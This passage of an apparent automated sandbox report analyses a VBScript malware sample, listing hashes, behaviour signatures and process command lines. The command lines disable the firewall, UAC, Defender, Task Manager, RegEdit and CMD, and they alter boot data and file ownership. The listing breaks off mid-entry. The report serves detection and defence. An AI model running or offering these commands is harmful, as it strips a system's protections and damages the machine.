Analysis
max time kernel: 284s
max time network: 279s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-05-2024 15:20

Static task: static1
Behavioral task: behavioral1 (Sample: malware.vbs, Resource: win7-20240221-en)
Behavioral task: behavioral2 (Sample: malware.vbs, Resource: win10v2004-20240226-en)
Errors

General
Target: malware.vbs
Size: 5KB
MD5: 97b26482ceb60d0f7cddfc0ca528f9ef
SHA1: 0aa4343f9a757f864d617279fa4766b0a38ce72f
SHA256: 48db7f40db76b3820b5c47d30f4cb99b79e755cbf61dddd6f2012f26eea52c9a
SHA512: 5d1a5ee7ea521ceff427c402527bfba365579e25892a029d0d9ed77fe4b22c453c18fe48e24d275e090c00d2efb2e0adcf753e1658b2c061de61ea52b43c1af0
SSDEEP: 96:qD5YNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/MNa:qD5YqrZgX7yrCdPidfbU0a
Malware Config
Signatures
UAC bypass 2 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
pid | process
2584 | bcdedit.exe
1864 | bcdedit.exe
1156 | bcdedit.exe
1440 | bcdedit.exe
Creates new service(s) 2 TTPs
Disables RegEdit via registry modification 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | reg.exe
Disables Task Manager via registry modification
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid | process
700 | netsh.exe
2460 | netsh.exe
Possible privilege escalation attempt 8 IoCs
Processes:
pid | process
2412 | takeown.exe
3132 | icacls.exe
4364 | takeown.exe
1436 | icacls.exe
2360 | takeown.exe
2184 | icacls.exe
2556 | takeown.exe
2088 | icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid | process
2184 | icacls.exe
2556 | takeown.exe
2088 | icacls.exe
2412 | takeown.exe
3132 | icacls.exe
4364 | takeown.exe
1436 | icacls.exe
2360 | takeown.exe
Drops file in System32 directory 19 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | OpenWith.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
1352 | sc.exe
2060 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | process
4616 | ipconfig.exe
3600 | ipconfig.exe
Kills process with taskkill 2 IoCs
Processes:
pid | process
2932 | taskkill.exe
2192 | taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached | reg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" | OpenWith.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | cmd.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dac0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | cmd.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | cmd.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus" | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | reg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1" | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | cmd.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | reg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | cmd.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09" | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | cmd.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000d67b69c000aada01 | cmd.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\International | reg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System | reg.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008bf97dc100aada01 | OpenWith.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System | reg.exe
Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | OpenWith.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\ | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache | reg.exe
Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | OpenWith.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | reg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" | OpenWith.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | cmd.exe
Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | OpenWith.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows | reg.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | OpenWith.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "221" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System | reg.exe
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{B7308E23-BF31-4212-BB8A-CA5B11D9C512} | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{41B39822-E41D-43EC-9C0D-4B7162BC9910} | msedge.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid | process
2168 | taskmgr.exe
2168 | taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
pid | process
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
description | pid | process
Token: SeRestorePrivilege | 4896 | 7zG.exe
Token: 35 | 4896 | 7zG.exe
Token: SeDebugPrivilege | 2168 | taskmgr.exe
Token: SeSystemProfilePrivilege | 2168 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 2168 | taskmgr.exe
Token: 33 | 2168 | taskmgr.exe
Token: SeIncBasePriorityPrivilege | 2168 | taskmgr.exe
Token: SeShutdownPrivilege | 3224 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3224 | powercfg.exe
Token: SeShutdownPrivilege | 3696 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3696 | powercfg.exe
Token: SeShutdownPrivilege | 2904 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2904 | powercfg.exe
Token: SeShutdownPrivilege | 1248 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1248 | powercfg.exe
Token: SeDebugPrivilege | 2192 | taskkill.exe
Token: SeDebugPrivilege | 1648 | whoami.exe
Token: SeTakeOwnershipPrivilege | 2556 | takeown.exe
Token: SeShutdownPrivilege | 1440 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1440 | powercfg.exe
Token: SeShutdownPrivilege | 1156 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1156 | powercfg.exe
Token: SeShutdownPrivilege | 2248 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2248 | powercfg.exe
Token: SeShutdownPrivilege | 496 | powercfg.exe
Token: SeCreatePagefilePrivilege | 496 | powercfg.exe
Token: SeDebugPrivilege | 3304 | whoami.exe
Token: SeTakeOwnershipPrivilege | 2412 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4364 | takeown.exe
Token: SeTakeOwnershipPrivilege | 2360 | takeown.exe
Token: SeShutdownPrivilege | 3396 | shutdown.exe
Token: SeRemoteShutdownPrivilege | 3396 | shutdown.exe
Suspicious use of FindShellTrayWindow 53 IoCs
Processes:
pid | process
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
Suspicious use of SendNotifyMessage 51 IoCs
Processes:
pid | process
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
2168 | taskmgr.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
3276 | msedge.exe
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
pid | process
4004 | OpenWith.exe
3088 | OpenWith.exe
832 | OpenWith.exe
4460 | LogonUI.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 1408 wrote to memory of 2932 | 1408 | cmd.exe | taskkill.exe
PID 1408 wrote to memory of 2932 | 1408 | cmd.exe | taskkill.exe
PID 3660 wrote to memory of 3816 | 3660 | cmd.exe | net.exe
PID 3660 wrote to memory of 3816 | 3660 | cmd.exe | net.exe
PID 3816 wrote to memory of 2372 | 3816 | net.exe | net1.exe
PID 3816 wrote to memory of 2372 | 3816 | net.exe | net1.exe
PID 3660 wrote to memory of 3224 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 3224 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 3696 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 3696 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 2904 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 2904 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 1248 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 1248 | 3660 | cmd.exe | powercfg.exe
PID 3660 wrote to memory of 2460 | 3660 | cmd.exe | netsh.exe
PID 3660 wrote to memory of 2460 | 3660 | cmd.exe | netsh.exe
PID 1408 wrote to memory of 2192 | 1408 | cmd.exe | taskkill.exe
PID 1408 wrote to memory of 2192 | 1408 | cmd.exe | taskkill.exe
PID 3660 wrote to memory of 4460 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4460 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4280 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4280 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2964 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2964 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 5080 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 5080 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2412 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2412 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4300 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4300 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2120 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2120 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2204 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2204 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2556 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2556 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 1544 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 1544 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 3852 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 3852 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2376 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2376 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 548 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 548 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4988 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4988 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4400 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4400 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 1348 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 1348 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4416 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4416 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 3892 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 3892 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4928 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4928 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4420 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4420 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2652 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2652 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4348 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 4348 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2876 | 3660 | cmd.exe | reg.exe
PID 3660 wrote to memory of 2876 | 3660 | cmd.exe | reg.exe
Processes
(child processes are indented under their parent)

C:\Windows\System32\WScript.exe
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"

C:\Windows\System32\rundll32.exe
  command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8

C:\Program Files\7-Zip\7zG.exe
  command line: "C:\Program Files\7-Zip\7zG.exe" a -i#7zMap18481:94:7zEvent10232 -ad -saa -- "C:\Users\Admin\AppData\Local\Temp\malware"
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\taskmgr.exe
  command line: "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

C:\Windows\system32\cmd.exe
  command line: "C:\Windows\system32\cmd.exe"
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\taskkill.exe
      command line: taskkill -f -im
      - Kills process with taskkill

    C:\Windows\system32\taskkill.exe
      command line: taskkill /f /im archive.bat
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\archive.bat" "
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe
      command line: net session
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 session

    C:\Windows\system32\powercfg.exe
      command line: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe
      command line: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe
      command line: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe
      command line: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\netsh.exe
      command line: netsh advfirewall set allprofiles state off
      - Modifies Windows Firewall

    C:\Windows\system32\reg.exe
      command line: REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Control Panel\Desktop\MuiCached" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Control Panel\Desktop\MuiCache" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f

    C:\Windows\system32\reg.exe
